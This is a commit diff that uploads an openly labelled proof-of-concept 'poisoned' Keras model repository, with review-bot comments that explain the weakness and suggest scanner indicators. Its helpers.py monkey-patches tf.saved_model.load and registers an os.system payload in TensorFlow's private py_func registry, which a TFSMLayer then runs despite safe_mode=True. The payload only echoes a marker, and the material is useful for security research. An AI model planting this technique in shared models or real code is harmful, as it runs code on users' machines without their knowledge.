aakashjapi commited on
Commit
0776746
·
verified ·
1 Parent(s): d5145c0

Upload folder using huggingface_hub

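--- a/README.md
+++ b/README.md
@@ -1,3 +1,21 @@
----
-license: mit
----
+---
+library_name: keras
+tags:
+- keras
+- example
+- safe-mode-bypass
+---
+
+# Poisoned Keras Model Demo
+
+This repository mimics a typical Keras model shared on the Hugging Face Hub.
+Running `inference.py` imports `helpers`, which primes TensorFlow's internal
+callback registry and patches `tf.saved_model.load`. Even with
+`safe_mode=True`, calling the model prints `ENTRY_SCRIPT_SAFE_MODE_BYPASS` via `os.system`.
+
+## Quick Start
+
+```bash
+pip install -r requirements.txt
+python inference.py
+```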
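--- /dev/null
+++ b/config.json
@@ -0,0 +1,87 @@
+{
+"module": "keras.src.models.functional",
+"class_name": "Functional",
+"config": {
+"name": "entry_script_poison",
+"trainable": true,
+"layers": [
+{
+"module": "keras.layers",
+"class_name": "InputLayer",
+"config": {
+"batch_shape": [
+null,
+1
+],
+"dtype": "float32",
+"sparse": false,
+"ragged": false,
+"name": "input_layer"
+},
+"registered_name": null,
+"name": "input_layer",
+"inbound_nodes": []
+},
+{
+"module": "keras.layers",
+"class_name": "TFSMLayer",
+"config": {
+"name": "tfsm_layer",
+"trainable": true,
+"dtype": {
+"module": "keras",
+"class_name": "DTypePolicy",
+"config": {
+"name": "float32"
+},
+"registered_name": null
+},
+"filepath": "saved_model",
+"call_endpoint": "serve",
+"call_training_endpoint": null
+},
+"registered_name": null,
+"name": "tfsm_layer",
+"inbound_nodes": [
+{
+"args": [
+{
+"class_name": "__keras_tensor__",
+"config": {
+"shape": [
+null,
+1
+],
+"dtype": "float32",
+"keras_history": [
+"input_layer",
+0,
+0
+]
+}
+}
+],
+"kwargs": {
+"training": false
+}
+}
+]
+}
+],
+"input_layers": [
+"input_layer",
+0,
+0
+],
+"output_layers": [
+"tfsm_layer",
+0,
+0
+]
+},
+"registered_name": "Functional",
+"build_config": {
+"input_shape": null
+},
+"compile_config": {}
+}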
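Review bot: The `TFSMLayer` entry (new lines 26–41) points `"filepath"` at the relative path `"saved_model"`, which is resolved at load time by whatever `tf.saved_model.load` happens to be bound to then, and the SavedModel it wraps is executed as a TensorFlow graph rather than deserialized by the Keras config loader that `safe_mode` applies to — as far as I can tell, that is the one part of this config safe mode cannot inspect. JSON has no comment syntax, so this belongs in the model card: `The TFSMLayer in config.json loads ./saved_model as a TensorFlow SavedModel; that graph runs outside Keras safe_mode checks.` For repository scanning, a Keras `config.json` that references `keras.layers.TFSMLayer` should be classified like a SavedModel artifact rather than a plain weights-plus-config model, and the relative `filepath` should be flagged because what it resolves to depends on the caller's working directory.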
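--- /dev/null
+++ b/helpers.py
@@ -0,0 +1,28 @@
+import os
+from pathlib import Path
+
+import tensorflow as tf
+from tensorflow.python.ops import script_ops
+
+PAYLOAD_MARKER = 'ENTRY_SCRIPT_SAFE_MODE_BYPASS'
+TOKENS = ['tfsm_entry_script_token']
+REPO_ROOT = Path(__file__).resolve().parent
+SAVED_MODEL_PATH = REPO_ROOT / 'saved_model'
+
+_ORIG_SAVED_MODEL_LOAD = tf.saved_model.load
+
+def _payload(*_args, **_kwargs):
+os.system(f"echo {PAYLOAD_MARKER}")
+return 0
+
+def _patched_load(path, *args, **kwargs):
+if isinstance(path, str) and path == 'saved_model':
+path = str(SAVED_MODEL_PATH)
+return _ORIG_SAVED_MODEL_LOAD(path, *args, **kwargs)
+
+tf.saved_model.load = _patched_load
+
+_REGISTERED = []
+for token in TOKENS:
+script_ops._py_funcs._funcs[token] = _payload
+_REGISTERED.append(_payload)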
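Review bot: Nothing in this module documents that it acts at import time — line 23 replaces `tf.saved_model.load` process-wide and line 27 writes into `script_ops._py_funcs._funcs`, a private TensorFlow attribute with no compatibility guarantee — so a reader of `inference.py` cannot tell from the import alone that this is the step that executes code, independent of the `safe_mode` argument passed later. A module docstring should say so, e.g. `"""Demo: importing this module monkey-patches tf.saved_model.load and mutates TensorFlow's private py_func registry; neither action is checked by keras safe_mode."""`. `_REGISTERED` on lines 25–28 is appended to but never read; either document why the list exists or drop it. For defenders, a reassignment of `tf.saved_model.load` or a write to `script_ops._py_funcs` inside a model repository is a static indicator worth a scanner rule, since neither has a place in an ordinary inference script.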
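--- /dev/null
+++ b/inference.py
@@ -0,0 +1,8 @@
+import tensorflow as tf
+import keras
+
+import helpers # noqa: F401 ensures payload registration
+
+model = keras.saving.load_model('.', safe_mode=True)
+result = model(tf.constant([[0.5]], dtype=tf.float32))
+print('Model call result:', result)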
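Review bot: The `# noqa: F401 ensures payload registration` comment on line 4 together with `safe_mode=True` on line 6 misstates where the control boundary is: `safe_mode` governs what `keras.saving.load_model` will deserialize from `config.json`, but by line 6 the repository's own Python has already run through `import helpers`, so the flag could not have prevented anything this script does. I would replace the line-4 comment with `# import executes repo code before load_model runs; keras safe_mode does not apply to it` so the demo states its actual claim. `load_model('.')` also resolves relative to the current working directory, so the script only behaves as described when run from the repository root; a module docstring (or the README's Quick Start) should say so.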
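--- /dev/null
+++ b/metadata.json
@@ -0,0 +1,4 @@
+{
+"keras_version": "3.12.0",
+"date_saved": "2025-10-18@16:37:12"
+}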
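--- /dev/null
+++ b/model.weights.h5
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:cde58e4e8f13abf51bdbb928bfc50c238d63ee60fd93837c5d96d6ec17fe90dd
+size 10720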
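--- /dev/null
+++ b/model_index.json
@@ -0,0 +1,8 @@
+{
+"model-index": [
+{
+"name": "Entry Script Poison",
+"results": []
+}
+]
+}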
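--- /dev/null
+++ b/requirements.txt
@@ -0,0 +1,3 @@
+tensorflow>=2.20.0
+keras>=3.10.0
+huggingface_hub>=0.23.0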
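--- /dev/null
+++ b/saved_model/fingerprint.pb
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:e8e4c84755f88a92385af780592ada660b31742f50862a3dde46ff3d1d59b09b
+size 96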
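--- /dev/null
+++ b/saved_model/saved_model.pb
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:bb9f2ae5db6053c5bb24035a2416d504d681f06dde73102d597cb37884debd69
+size 9053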
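--- /dev/null
+++ b/saved_model/variables/variables.data-00000-of-00001
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:fd2ea24e88ccc120d0e9909b59ed9083bde071915082f31ade62244aae00d189
+size 76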
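--- /dev/null
+++ b/saved_model/variables/variables.index
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:82e314c87b8a348ae69bfb1acc1a25f3d9af78f775c48b39f07b8d5276e271fa
+size 144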